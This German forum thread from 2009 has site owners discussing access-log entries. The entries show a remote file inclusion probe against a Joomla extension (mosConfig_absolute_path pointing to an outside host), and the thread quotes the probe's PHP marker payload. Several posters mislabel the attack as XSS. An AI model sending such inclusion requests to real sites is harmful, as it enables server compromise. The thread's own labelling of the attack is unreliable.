1. Home
  2. Forum
Raptor
Avatar Raptor
Themenersteller
IT-Student
Content Gott (1013 Beiträge)

Hack-Zugriff?

am 03.12.2009, 11:41 Uhr eröffnete Raptor folgenden Thread
Sonstige    2528 mal gelesen    7 Antwort(en).

Salut,

ich hatte heute Morgen einen fragwürdigen Zugriff auf meine Seite:
/components/com_artref/artref.php?mosConfig_absolute_path=http://ujcar.deva.rdsnet.ro/images/id1???
und zwar unter drei verschiedenen Verzeichnissen. (Die drei Fragezeichen waren auch dabei.)
Soviel ich herausfinden konnte, hat dieser Pfad etwas mit Joomla zu tun, ich selbst benutze aber kein Joomla. Der Zugriff kam übrigens aus der Lateinamerika/Karibik (Proxy?).
Sollte das eine Art Hack sein? Die angegebene Seite sieht nach XSS aus.

Und wo wir schon bei unerklärlichen Zugriffen sind:
letztens hatte ich Zugriffe auf die Seite /?q=save+us+from+berlusconi. Scheint ein weit verbreiterter Query zu sein, nur blöd, dass meine Seite mit dem Parameter "q" nichts anfangen kann.

Meine Developer-Website mit den Web-Entwickler-Tools.
Meine Web-Entwicklungs-Dienstleistungen

[url="http://www.seitenreport.de/forum/beitraege/seitenreport_verlosungen/wichtig_neue_regel
der_booker
Foren Moderator
selbständig
(2762 Beiträge)
am 03.12.2009, 11:44 Uhr schrieb der_booker

Hallo Flo, das kann mit dem Test "Alexa manipulieren" zusammen hängen. Dort verwende ich ja Proxy-Server.

Heiko Jendreck
personal helpdesk
http://www.phw-jendreck.de
http://www.seo-labor.com
hansen
Foren Moderator
Content Gott (1886 Beiträge)
am 03.12.2009, 11:53 Uhr schrieb hansen

Raptor schrieb:

Salut,

ich hatte heute Morgen einen fragwürdigen Zugriff auf meine Seite:
/components/com_artref/artref.php?mosConfig_absolute_path=http://ujcar.deva.rdsnet.ro/images/id1???
und zwar unter drei verschiedenen Verzeichnissen. (Die drei Fragezeichen waren auch dabei.)
Soviel ich herausfinden konnte, hat dieser Pfad etwas mit Joomla zu tun, ich selbst benutze aber kein Joomla. Der Zugriff kam übrigens aus der Lateinamerika/Karibik (Proxy?).
Sollte das eine Art Hack sein? Die angegebene Seite sieht nach XSS aus.

Und wo wir schon bei unerklärlichen Zugriffen sind:
letztens hatte ich Zugriffe auf die Seite /?q=save+us+from+berlusconi. Scheint ein weit verbreiterter Query zu sein, nur blöd, dass meine Seite mit dem Parameter "q" nichts anfangen kann.


Hallo Flo,

der erste Zugriff könnte doch auch von einer Bildersuche kommen (/images/), oder?

hansen

Nepal Rundreisen
Raptor
Avatar Raptor
IT-Student
Content Gott (1013 Beiträge)
am 03.12.2009, 12:03 Uhr schrieb Raptor

der_booker schrieb:

Hallo Flo, das kann mit dem Test "Alexa manipulieren" zusammen hängen. Dort verwende ich ja Proxy-Server.


Ich denke eher nicht, dass es damit einen Zusammenhang gibt. Warum sollte durch diesen Test eine solche Seite aufgerufen werden?
Es sieht mir mehr nach versuchtem XSS aus.
Unter der angegebenen Seite (ujcar.deva.rdsnet.ro/images/id1???) lässt sich folgenden Inhalt sehen:
<?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>

der_booker schrieb:

der erste Zugriff könnte doch auch von einer Bildersuche kommen (/images/), oder?


Ich weiss jetzt nicht worauf du hinaus willst. Ich denke nicht, dass es was mit einer Suche zu tun hat.
Die Log-Einträge sehen etwa so aus:

/components/com_artref/artref.php?mosConfig_absolute_path=http://ujcar.deva.rdsnet.ro/images/id1???
/webscripting/components/com_artref/artref.php?mosConfig_absolute_path=http://ujcar.deva.rdsnet.ro/images/id1?...
/webscripting/target-blank-in-xhtml-1-1/components/com_artref/artref.php?mosConfig_absolute_path=http://ujcar...

kein Referrer und mit Agent "Mozilla/5.0".

Meine Developer-Website mit den Web-Entwickler-Tools.
Meine Web-Entwicklungs-Dienstleistungen

[url="http://www.seitenreport.de/forum/beitraege/seitenreport_verlosungen/wichtig_neue_regel
romacron
 JDev Xer
Content Gott (1224 Beiträge)
am 03.12.2009, 12:34 Uhr schrieb romacron

XSS , denke ich auch


Und wo wir schon bei unerklärlichen Zugriffen sind:
letztens hatte ich Zugriffe auf die Seite /?q=save+us+from+berlusconi. Scheint ein weit verbreiterter Query zu sein, nur blöd, dass meine Seite mit dem Parameter "q" nichts anfangen kann.



Das zweite sieht nach einer Suchanfrage aus

seitenreport
Avatar seitenreport
Inhaber
TYPO3 Senior Developer
Content Gott (1772 Beiträge)
am 03.12.2009, 13:09 Uhr schrieb seitenreport

Raptor schrieb:

ich hatte heute Morgen einen fragwürdigen Zugriff auf meine Seite:
/components/com_artref/artref.php?mosConfig_absolute_path=http://ujcar.deva.rdsnet.ro/images/id1???
und zwar unter drei verschiedenen Verzeichnissen. (Die drei Fragezeichen waren auch dabei.)
Soviel ich herausfinden konnte, hat dieser Pfad etwas mit Joomla zu tun, ich selbst benutze aber kein Joomla. Der Zugriff kam übrigens aus der Lateinamerika/Karibik (Proxy?).
Sollte das eine Art Hack sein? Die angegebene Seite sieht nach XSS aus..


Die mosConfig Zugriffe sind immer Angriffe auf vermeintliche Joomla Systeme (und oft erfolgreich).

Wenn eine recht neue Version von Joomla verwendet wird, besteht hier keine Gefahr. Ältere Versionen dagegen sind sehr anfällig (eine Freundin von mir traf es z.B. vor etwa 5 Monaten - der Angreifer erhielt über obige Methode einen kompletten Backend Zugriff).

Wenn kein Joomla verwendet wird, sind die Angriffe mehr oder weniger harmlos.

Gruß,
Matthias

SEO Analyse und Website-Check mit Seitenreport
Raptor
Avatar Raptor
IT-Student
Content Gott (1013 Beiträge)
am 03.12.2009, 13:38 Uhr schrieb Raptor

seitenreport schrieb:

Die mosConfig Zugriffe auf Joomla sind immer Angriffe (und oft erfolgreich). Wenn eine recht neue Version von Joomla verwendet wird, besteht hier keine Gefahr. Ältere Versionen dagegen sind sehr anfällig (eine Freundin von mir traf es z.B. vor etwa 5 Monaten - der Angreifer erhielt über obige Methode einen kompletten Backend Zugriff).


Wie kann ein CMS nur so unsicher sein...
Wobei, ArtRef ist doch eine Erweiterung?

seitenreport schrieb:

Welche Joomla Version verwendest Du?


Wie gesagt, ich benutze Joomla gar nicht. (Ich benutze überhaupt kein CMS.)
Irgendeine Folge (ausser 404 Not Found) hatten die Zugriffe deshalb auch nicht.

Meine Developer-Website mit den Web-Entwickler-Tools.
Meine Web-Entwicklungs-Dienstleistungen

[url="http://www.seitenreport.de/forum/beitraege/seitenreport_verlosungen/wichtig_neue_regel
romacron
 JDev Xer
Content Gott (1224 Beiträge)
am 03.12.2009, 13:58 Uhr schrieb romacron

Ja, die Art-dings-bums ist ne Erweiterungs-Komponente. Wenn man alle server und php einstellungen richtig macht, kann da nichts per xss gemacht werden.

Das was am unsichersten ist, sind die Erweiterungen. Da werden kaum varieablen abgeklopft.


  • 1


« zurück zu: Sonstige

Das Seitenreport Forum hat aktuell 5273 Themen und 36107 Beiträge.
Insgesamt sind 48345 Mitglieder registriert.
Neueste Beiträge
Neueste Themen
01.12.2023, 18:31 Uhr
Vietcong
Hallo Zusammen, Gibt es hier zufällig noch Personen die…
erstellt von: seo
03.06.2023, 10:06 Uhr
Vietcong Informationsseite
Hallo zusammen, ich habe eine Website zu Vietcong 1…
erstellt von: seo
09.12.2022, 13:17 Uhr
Many thanks, this website is extremely helpful. www
Many thanks, this website is extremely helpful. www
erstellt von:
SEO Artikel
SEO Analyse
Die Seitenreport SEO Analyse analysiert Ihre Website kostenlos in über 100 Analyse-Kriterien.

Jetzt SEO und Website Analyse ausführen

SEO Tools